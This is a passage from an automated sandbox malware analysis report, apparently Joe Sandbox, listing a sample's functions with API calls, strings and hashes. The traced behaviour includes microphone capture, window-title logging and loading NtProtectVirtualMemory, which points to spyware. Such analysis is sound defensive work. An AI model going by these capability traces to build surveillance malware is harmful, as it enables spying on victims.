                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 15CA4F81
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 15CA4FCD
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15CA5150,?,00000000,00000000), ref: 15CA4FE0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 15CA4F94
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                    • API String ID: 2532271599-1507639952
                                                                                                                                                                                    • Opcode ID: 78a3f294a671b9c65f7c6d7dca852d083891d5df7a2d5ad885a29290075884e1
                                                                                                                                                                                    • Instruction ID: 0a9aa68727d5462095d4e266006f7b64f2787493376057f1ea28ae054c6ec167
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a3f294a671b9c65f7c6d7dca852d083891d5df7a2d5ad885a29290075884e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F11C63A9042D56BDB20AEB6CC49EDFBFB89BD2750F04494EE44153240EBB56045CBB2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA17EC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(00320500,00000020,?), ref: 15CA1849
                                                                                                                                                                                    • waveInAddBuffer.WINMM(00320500,00000020), ref: 15CA185F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                    • String ID: 045$jZos
                                                                                                                                                                                    • API String ID: 2315374483-3270310240
                                                                                                                                                                                    • Opcode ID: e4e141064f56bd0e77d37cfa391ed6f73780f7e8792771bd428132829997a482
                                                                                                                                                                                    • Instruction ID: cc85078bb3028686d207181e87cb812d0102c9e30b691954fd9d18b93ff2a894
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e141064f56bd0e77d37cfa391ed6f73780f7e8792771bd428132829997a482
                                                                                                                                                                                    • Instruction Fuzzy Hash: B80178B6710322AFDB108F69DCC8A65BFB9FF88290700052AE405C7701EF316C21CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CB376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,15D0611C), ref: 15CB377E
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(15D0611C,?,00000000,?,00000000,00000000), ref: 15CB37A6
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(15D0611C), ref: 15CB37B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                                    • String ID: Control Panel\Desktop
                                                                                                                                                                                    • API String ID: 1818849710-27424756
                                                                                                                                                                                    • Opcode ID: bf929970e97fba3f68a86a64da6a1c2bd9284121db1f525718fe7ab602922020
                                                                                                                                                                                    • Instruction ID: 207745da15143e964a064d8d7f14996c1a5ea0775587b65570d9ff6b161bc1d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf929970e97fba3f68a86a64da6a1c2bd9284121db1f525718fe7ab602922020
                                                                                                                                                                                    • Instruction Fuzzy Hash: 90F06D76500128BBCF009FA0DD55EEA3B7CEF48A90F104555FD05A6010EB31AE14DB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CD52AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 15CD52B7
                                                                                                                                                                                      • Part of subcall function 15CD524D: std::exception::exception.LIBCONCRT ref: 15CD525A
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 15CD52C5
                                                                                                                                                                                      • Part of subcall function 15CD9126: RaiseException.KERNEL32(?,?,15CD52CA,?,15D16B50,045,00000000,?,?,?,?,15CD52CA,?,15D0E508,?), ref: 15CD9185
                                                                                                                                                                                      • Part of subcall function 15CD5B78: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 15CD5B85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalExceptionException@8InitializeRaiseSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                    • String ID: 0/5$045
                                                                                                                                                                                    • API String ID: 2106822824-1284902932
                                                                                                                                                                                    • Opcode ID: cb345c4950d08b3f658bad838a6bbe67c492e2509b988e121e0b7d907c285302
                                                                                                                                                                                    • Instruction ID: d95dd6e10f9b6c62f5d907aacb1392ffee98a0fa710122f452b1cd9c79ef8032
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb345c4950d08b3f658bad838a6bbe67c492e2509b988e121e0b7d907c285302
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83E0926BE10318278A00A97DAC488CEB3BD9D610117410866EF11E6100EE60B94A86D4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 032479FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 03247A09
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 03247A0F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03247A04
                                                                                                                                                                                    • NtProtectVirtualMemory, xrefs: 032479FF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                                                                                                    • Opcode ID: 1a7ab2b5c89ecb28188669b492999bef56e7f339ff771c15c064662eb24bb349
                                                                                                                                                                                    • Instruction ID: 63b5f1b5f0b5463e5999937b7a1443bb66fd5dfe6f873df96c105c30fc1494a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a7ab2b5c89ecb28188669b492999bef56e7f339ff771c15c064662eb24bb349
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E0BFB525021D7F8B40EFACDC85D8F37DCAB1D2407008001BB28D7601C6B5E5519FB4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323C430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0325A10B,00000000,0325A11E), ref: 0323C436
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0325A10B,00000000,0325A11E), ref: 0323C447
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                                    • Opcode ID: 70143f20264d0ab9fca2643656cee5024aab17a6210bbdbfa49ad433a94a1e0e
                                                                                                                                                                                    • Instruction ID: 827d1e9a09326609bc3967a10818741177ed75f0b5fb65a214bb1a5083ce8734
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70143f20264d0ab9fca2643656cee5024aab17a6210bbdbfa49ad433a94a1e0e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86D0A7F1A6032A5FDB00FAB574CC63962EC9307701F00F028E31279509C6B5C8C08F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CEA004 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                                                    • Instruction ID: aa20698677eae580e701bfb28f9af982d8dfd6ab262ad9a9854495770fd0d908
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99A16636A043869FD712CF5CCC85BAEBFE1FF11310F14496ED989AB281C6B9A981C750
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE2801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 612978ab0d669fe69c38abb4dcfd58aecbbaf9b98c2716f0c6fe660a084a9b87
                                                                                                                                                                                    • Instruction ID: 2962364c7fb4d6fcc12407f0bb946b87193c78c2d4839676f2b697b35c489f16
                                                                                                                                                                                    • Opcode Fuzzy Hash: 612978ab0d669fe69c38abb4dcfd58aecbbaf9b98c2716f0c6fe660a084a9b87
                                                                                                                                                                                    • Instruction Fuzzy Hash: C341E477B00344AFD3249F78CC40B9ABFEAEB88710F104A2AE155DB690DA71F95187D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA4CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,15D14F50), ref: 15CA4DB3
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,15D14EF8,00000000,00000000), ref: 15CA4DC7
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 15CA4DD2
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4DDB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3360349984-0
                                                                                                                                                                                    • Opcode ID: 2160cca20faf1cee96beb141721d42f683869acb945a70888d3418db745ad412
                                                                                                                                                                                    • Instruction ID: fa90a2ca5e07069f3df441c851a5850503a95fd714443c30926731b497d5dd7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2160cca20faf1cee96beb141721d42f683869acb945a70888d3418db745ad412
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8141507B608356ABC714EF61CD94DAFBBADAF94650F400D1DF49282190EF24B909CA61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323E1A4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0323E253
                                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0323E26F
                                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0323E2E6
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0323E30F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 920484758-0
                                                                                                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                    • Instruction ID: 4eec95bc8c8fec62cb937b86aa017d009b00ed7450d6a70283e072a271dfd340
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                    • Instruction Fuzzy Hash: F441FBBAA1431E9FCB61DB58C890BD9B3BCAF4A600F0541D5E549A7211DA70AFC58F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF112C Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,15CDF8C8,?,00000000,?,00000001,?,?,00000001,15CDF8C8,?), ref: 15CF1179
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 15CF1202
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,15CDAE84,?), ref: 15CF1214
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CF121D
                                                                                                                                                                                      • Part of subcall function 15CE6137: HeapAlloc.KERNEL32(00000000,15CD52BC,?,?,15CD8847,?,?,00000000,15D16B50,?,15CADE62,15CD52BC,?,?,?,?), ref: 15CE6169
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 573072132-0
                                                                                                                                                                                    • Opcode ID: 8aa737d9f628f1103e9df6a5a172368a4fa75fb2ae215da7df231371aaab89e0
                                                                                                                                                                                    • Instruction ID: 5ee314fa7bf7e3809b9323ac08b89fc97f910c451a91c651439528a713b85ca2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa737d9f628f1103e9df6a5a172368a4fa75fb2ae215da7df231371aaab89e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C831F276A0021AABDF15CFA5CC80DEF7BB5EF81610F11496AEC05D7290EB35E961CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323ACF8 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0323AD15
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0323AD39
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323AD54
                                                                                                                                                                                    • LoadStringA.USER32 ref: 0323ADEA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                                    • Opcode ID: bf6fe075587d3865c150b7473ffa3b25560ca353c6d7f5357eac7d8821e995f2
                                                                                                                                                                                    • Instruction ID: 0a88228d4f7f98b5e38711cbfc2c18b6b01241cba0bfada37c18a91b49c2e17c
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6fe075587d3865c150b7473ffa3b25560ca353c6d7f5357eac7d8821e995f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4413EB5A1035C9BDB21EB68DC84BDEB7FCAB0A241F4440E5A548EB251D7B49FC48F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323ACF6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0323AD15
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0323AD39
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323AD54
                                                                                                                                                                                    • LoadStringA.USER32 ref: 0323ADEA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                                    • Opcode ID: e2ba9048c65c16e5c5ad5283d1ed0658297817a96feb6a581377a125007c9ba6
                                                                                                                                                                                    • Instruction ID: b185717d7900ded2b5f25ff5d656c66b7673d47d4206a34ef50043a8cafb4977
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2ba9048c65c16e5c5ad5283d1ed0658297817a96feb6a581377a125007c9ba6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 904132B5A1035C9BDB21EB68DC84BDAB7FC9B0A341F4440E5A548EB251D7B49FC48F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAA529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CBC551: GetForegroundWindow.USER32 ref: 15CBC561
                                                                                                                                                                                      • Part of subcall function 15CBC551: GetWindowTextLengthW.USER32 ref: 15CBC56A
                                                                                                                                                                                      • Part of subcall function 15CBC551: GetWindowTextW.USER32 ref: 15CBC594
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 15CAA573
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 15CAA5FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                    • String ID: [ $ ]
                                                                                                                                                                                    • API String ID: 3309952895-93608704
                                                                                                                                                                                    • Opcode ID: 6399631bb5f1a7621b8d9772da080d379dbd41f4e153fb8b0f6abd63d3033cc3
                                                                                                                                                                                    • Instruction ID: f43966d7fa8c911a09331f9f48130af6d7f1a00ef0d1e9247e574a71ec79b8e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6399631bb5f1a7621b8d9772da080d379dbd41f4e153fb8b0f6abd63d3033cc3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E118E3B6142029BC618FE68CC5199FBFA9AF90240F800D1DE553520A0FFA1FA08CBD6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAA675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 15CAA6AB
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,15CAA74D), ref: 15CAA6BA
                                                                                                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,15CAA74D), ref: 15CAA6E7
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CAA6EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1958988193-0
                                                                                                                                                                                    • Opcode ID: c2f2778b18ed07a02e49b089b2e1d5221d5351f24d21b4a071a971637e080ae0
                                                                                                                                                                                    • Instruction ID: 195ed2b94bcc3b0082c656ec2e9ea02554564dce4d720f49594ebd3699260279
